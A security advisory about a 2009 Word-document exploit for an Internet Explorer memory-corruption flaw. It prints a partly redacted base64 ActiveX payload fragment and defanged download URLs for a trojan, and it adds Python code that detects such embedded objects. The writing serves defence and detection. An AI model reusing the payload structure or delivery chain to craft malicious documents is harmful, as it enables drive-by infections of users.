MS09-002 Exploit (Feb 18, 2009)

The SonicWALL UTM Research Team has observed a new MS09-002 exploit being used in the wild in drive-by attacks.

This exploit involves a malicious Microsoft Word (.doc) document in XML format being delivered to the end user. The .doc has a file size of 3,871 bytes and attempts to exploit the Uninitialized Memory Corruption vulnerability (CVE-2009-0075) in Internet Explorer 7, which Microsoft patched in the MS09-002 release.

The malicious Word document contains the following specially crafted data bytes:

w:ocx w_data="DATA:application/x-oleobject;BASE64,rv0krsYD0RGLdgCAx0TziQAAOAAAAGgAdAB0AHA (REMOVED) gAZQBuAGcAagBp AHQAagAuAGMAbwBtAC8AYgBiAHMALwBpAG0AYQBnAGUAcwA vAGEAbABpAHAAYQB5AC8AbQBtAC8A agBjAC8AagBjAC4AaAB0AG0AbAA= " w_id="DefaultOcxName" w_name="DefaultOcxName" w_classid="CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389" w_w="200" w_h="123" wx_iPersistPropertyBag="true"

When the end user opens the document, it uses the Microsoft Scriptlet Component ActiveX control (CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389) to connect to the following malicious URL:

  • hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.html [detected as GAV: XMLhttpd.D (Exploit)]
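The w:ocx fragment above is what a defender can key on: the base64 OLE object opens with the control's CLSID stored as a little-endian GUID and carries the target URL as UTF-16LE text. The following added example (not SonicWALL's code) scans Word XML for such elements, decodes the payload, checks the embedded GUID against the declared classid and the Scriptlet CLSID named in this advisory, and pulls out any URLs; the sample document it builds is constructed here, with a placeholder host, and its header layout after the GUID is an assumption.

```python
import base64
import re
import uuid

# CLSID of the Microsoft Scriptlet Component, as named in the advisory.
SCRIPTLET_CLSID = "AE24FDAE-03C6-11D1-8B76-0080C744F389"
OLE_PREFIX = "DATA:application/x-oleobject;BASE64,"
OCX_TAG = re.compile(r"<w:ocx\b([^>]*?)/?>", re.I)
ATTR = re.compile(r'([\w:]+)\s*=\s*"([^"]*)"')
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")  # printable ASCII stored as UTF-16LE


def inspect_ocx(xml_text):
    """Return one finding per w:ocx element whose data attribute carries a base64 OLE object."""
    findings = []
    for tag in OCX_TAG.finditer(xml_text):
        # Accept both the real Word XML names (w:data) and the flattened w_data spelling.
        attrs = {k.lower().replace(":", "_"): v for k, v in ATTR.findall(tag.group(1))}
        data = attrs.get("w_data", "")
        if not data.upper().startswith(OLE_PREFIX.upper()):
            continue
        # Extracted documents often wrap the base64; strip all whitespace before decoding.
        raw = base64.b64decode(re.sub(r"\s+", "", data[len(OLE_PREFIX):]))
        # The persisted property bag begins with the control's CLSID as a little-endian GUID.
        embedded = str(uuid.UUID(bytes_le=raw[:16])).upper() if len(raw) >= 16 else ""
        declared = attrs.get("w_classid", "").upper().replace("CLSID:", "")
        urls = []
        for run in UTF16_RUN.finditer(raw):
            urls += re.findall(r"https?://\S+", run.group().decode("utf-16-le"))
        findings.append({"declared_clsid": declared, "embedded_clsid": embedded,
                         "urls": urls, "scriptlet": SCRIPTLET_CLSID in (declared, embedded)})
    return findings


def build_sample_doc(url):
    """Constructed sample shaped like the advisory's fragment; not the real malicious file.
    Layout after the GUID (2 zero bytes, byte length, UTF-16LE string) is an assumption."""
    body = url.encode("utf-16-le")
    blob = uuid.UUID(SCRIPTLET_CLSID).bytes_le + b"\x00\x00" + len(body).to_bytes(4, "little") + body
    b64 = base64.b64encode(blob).decode()
    wrapped = " ".join(b64[i:i + 40] for i in range(0, len(b64), 40))  # mimic wrapped extraction
    return ('<w:ocx w:data="%s%s" w:id="DefaultOcxName" w:classid="CLSID:%s" '
            'w:w="200" w:h="123"/>' % (OLE_PREFIX, wrapped, SCRIPTLET_CLSID))


if __name__ == "__main__":
    for finding in inspect_ocx(build_sample_doc("http://placeholder.invalid/jc/jc.html")):
        print(finding)
```

A mismatch between the declared and embedded CLSID, or any URL inside an OLE property bag, is worth flagging on its own even when the CLSID is not the Scriptlet control.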

The jc.html file contains obfuscated JavaScript code that in turn downloads a Trojan from the following URL:

  • hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.exe [detected as GAV: Rincux_4 (Trojan)]

The exploit has very low antivirus detection and is also known as Exploit-MSWord.k trojan (McAfee). SonicWALL GAV detects this exploit as GAV: MSWord.K (Exploit).
